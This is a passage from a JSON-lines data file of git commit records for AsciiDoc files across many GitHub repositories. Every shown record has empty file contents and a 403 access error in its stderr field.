5.2","message":"Much draft notes about Papyrus 5.2\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58eae680a77572fd9efdb65179cd46e35de48489","subject":"Update 2016-09-26-X-Eement-Save-6KB.adoc","message":"Update 2016-09-26-X-Eement-Save-6KB.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-26-X-Eement-Save-6KB.adoc","new_file":"_posts\/2016-09-26-X-Eement-Save-6KB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18c0cd23f3fb837dde471e39aea9cb3953d7039b","subject":"Update 2017-10-08-Acemice-Belki-Hadsizce-9.adoc","message":"Update 2017-10-08-Acemice-Belki-Hadsizce-9.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-9.adoc","new_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6444d951be3282c9a99e9e69360f16c837343a81","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66749ceddeecc7ec33a608b672a242fe45754c74","subject":"docs(apim): 
add upgrade guide for 3.18.10","message":"docs(apim): add upgrade guide for 3.18.10\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/upgrades\/3.18.10\/README.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/upgrades\/3.18.10\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e665f933758af70576e3bda3e5b883afa8365b07","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99afea68e4a8fa50356aa31a5c618594db537eae","subject":"Update 2019-11-16-Thinking-About-Life.adoc","message":"Update 2019-11-16-Thinking-About-Life.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-16-Thinking-About-Life.adoc","new_file":"_posts\/2019-11-16-Thinking-About-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a2c3234617f1d8e53eabd8bdf95088a3c56faa3","subject":"tutorial: create reveal.js and arc42 from scratch","message":"tutorial: create reveal.js and arc42 from scratch\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/110_revealjs_and_arc42_from_scratch.adoc","new_file":"src\/docs\/020_tutorial\/110_revealjs_and_arc42_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c823585bbe592d5f6b76da8096fb410fb9da7ee6","subject":"Added Endpoint completer to adoc","message":"Added Endpoint completer to 
adoc\n","repos":"pmoerenhout\/camel,apache\/camel,alvinkwekel\/camel,christophd\/camel,mcollovati\/camel,tadayosi\/camel,tdiesler\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,adessaigne\/camel,gnodet\/camel,objectiser\/camel,tdiesler\/camel,davidkarlsen\/camel,DariusX\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,nikhilvibhav\/camel,pax95\/camel,pmoerenhout\/camel,DariusX\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,DariusX\/camel,apache\/camel,davidkarlsen\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,ullgren\/camel,kevinearls\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,apache\/camel,ullgren\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,pmoerenhout\/camel,objectiser\/camel,mcollovati\/camel,mcollovati\/camel,kevinearls\/camel,tdiesler\/camel,DariusX\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,apache\/camel,Fabryprog\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,kevinearls\/camel,adessaigne\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tdiesler\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,pax95\/camel,zregvart\/camel,kevinearls\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,CodeSmell\/camel,Fabryprog\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e4c5a4ed3ce15393d6e90df8d74af151636f02a","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bab0a27eb7fc573440e130c0eb68ce060dabbed","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59f02a84dbc168a786a395c99bf0014ba4b57e29","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3e2deda66169830485e0c503c969132cd6ad12","subject":"Update 2015-10-31-toto.adoc","message":"Update 2015-10-31-toto.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-10-31-toto.adoc","new_file":"_posts\/2015-10-31-toto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4156604399da14f6e7ec2980c0f8336c13d306b","subject":"Update 2018-05-24-fear.adoc","message":"Update 2018-05-24-fear.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-05-24-fear.adoc","new_file":"_posts\/2018-05-24-fear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa989269a8f1c66e7c4910543896ffe87a4cd43","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6caa8b63062349cabefa5cb6eec25630ea313efb","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd1fc25f3dfdafc4fbf8814369a93d821a2c44cb","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8e5b90eaae6b41beaa2155857f71b576877ebb8","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0eaf426cca7180a21093e5a06b0f38935ce8552","subject":"Update 2015-07-17-How-Seque-Works.adoc","message":"Update 2015-07-17-How-Seque-Works.adoc","repos":"skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io","old_file":"_posts\/2015-07-17-How-Seque-Works.adoc","new_file":"_posts\/2015-07-17-How-Seque-Works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skeate\/skeate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b53f6b231dcfa6895a8eea4befeae6f25c428a8","subject":"Update 2016-04-14-Un-poco-sobre-nmap.adoc","message":"Update 2016-04-14-Un-poco-sobre-nmap.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Un-poco-sobre-nmap.adoc","new_file":"_posts\/2016-04-14-Un-poco-sobre-nmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6006e12ba3fcd7744abecceec1276fddd3abbf32","subject":"add Dutch Clojure Day 2017","message":"add Dutch Clojure Day 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/dutchclojureday.adoc","new_file":"content\/events\/2017\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"367fe556246c158786cdc964549c5f23f6e2d071","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c5567a66d97e4760deee2cbea2927e074be8647","subject":"Update 2018-03-27-Mah-Rocks.adoc","message":"Update 2018-03-27-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2018-03-27-Mah-Rocks.adoc","new_file":"_posts\/2018-03-27-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1e591da1b2b3836c4ea7400d8a804910a2f12d4","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd22bf479b2b952b24eaa698b0ef8b0020e54ef2","subject":"Update ipython_setup.adoc","message":"Update ipython_setup.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_setup.adoc","new_file":"docs\/ipython_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e9ae0e068564688002622d0f1d3f0f63832b374","subject":"Update 2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","message":"Update 2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_file":"_posts\/2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea167fd142a8f2533aeef46f557489c94955e63","subject":"Update 2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","message":"Update 2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","new_file":"_posts\/2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e52e2a47107243f5d0ffd6754da8f11ffc1b6dbb","subject":"Add video link to APM\/zipkin\/MSA blog post (#229)","message":"Add video link to APM\/zipkin\/MSA blog post 
(#229)\n\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/09\/19\/hawkular-apm-on-msa.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/09\/19\/hawkular-apm-on-msa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c91bc643ae20afd58028bf68f25b003cbe339dc7","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfd4484f5bbd33e08fe6c701f5045062137177f0","subject":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","message":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceb5db8ba85573052624389f84632aa4897b1126","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a910f5efc4be8ec9bfc41611a498fe667ae1c1fc","subject":"Add instructions for testing","message":"Add instructions for testing\n","repos":"EvidentSolutions\/apina,EvidentSolutions\/apina,EvidentSolutions\/apina","old_file":"docs\/testing.adoc","new_file":"docs\/testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EvidentSolutions\/apina.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"b7321716baa282249dc35525e3794995d41cebe8","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33770b58cdf30b0396cf56ba6e2b3c8041af009b","subject":"Add Arduino directories","message":"Add Arduino directories\n","repos":"ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan","old_file":"Arduino\/sketches\/readme.adoc","new_file":"Arduino\/sketches\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/robo_magellan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa87af5798a90fdb03e4117c8cfbdd830a3ef703","subject":"Update 2016-05-12-Hello.adoc","message":"Update 2016-05-12-Hello.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-12-Hello.adoc","new_file":"_posts\/2016-05-12-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c45444f66fcefe0ff4ef68dd2682249e1f2c433","subject":"Update 2016-11-09-Prova.adoc","message":"Update 2016-11-09-Prova.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-09-Prova.adoc","new_file":"_posts\/2016-11-09-Prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7047c97662f320f85c0a2a000cfe9d698c1eeeb7","subject":"Update 2016-12-06-Tytul.adoc","message":"Update 2016-12-06-Tytul.adoc","repos":"tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io","old_file":"_posts\/2016-12-06-Tytul.adoc","new_file":"_posts\/2016-12-06-Tytul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tr00per\/tr00per.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea7c4845c37078a013b9f8411d505aaa36f6650","subject":"Update 2016-07-17-Chat2.adoc","message":"Update 2016-07-17-Chat2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-17-Chat2.adoc","new_file":"_posts\/2016-07-17-Chat2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"925b58218f6d913b23da277ade30d047607a168a","subject":"y2b create post Awesome YouTube Mod!","message":"y2b create post Awesome YouTube Mod!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-29-Awesome-YouTube-Mod.adoc","new_file":"_posts\/2012-12-29-Awesome-YouTube-Mod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24be72b7005741ea27fe3adc56bf46083fbe9879","subject":"Update 2016-01-24-the-python-tutorial.adoc","message":"Update 2016-01-24-the-python-tutorial.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-24-the-python-tutorial.adoc","new_file":"_posts\/2016-01-24-the-python-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"827d1a6ce44f4e9351ac9c32104a4962025900e3","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc69ac3f1c4e9032a00ce094e2c83857b7a38481","subject":"tested Java 9 chapter, added clarifications","message":"tested Java 9 chapter, added clarifications\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7eb63af3d29078363e3ea1cf6c116734199fe73","subject":"Update 2018-05-12-The-First-Invitational.adoc","message":"Update 2018-05-12-The-First-Invitational.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2018-05-12-The-First-Invitational.adoc","new_file":"_posts\/2018-05-12-The-First-Invitational.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9e051e50c095532dcb68c0fb0659b3fc0340fc","subject":"Added a recipe for counting number of lines in a dataset","message":"Added a recipe for counting number of lines in a 
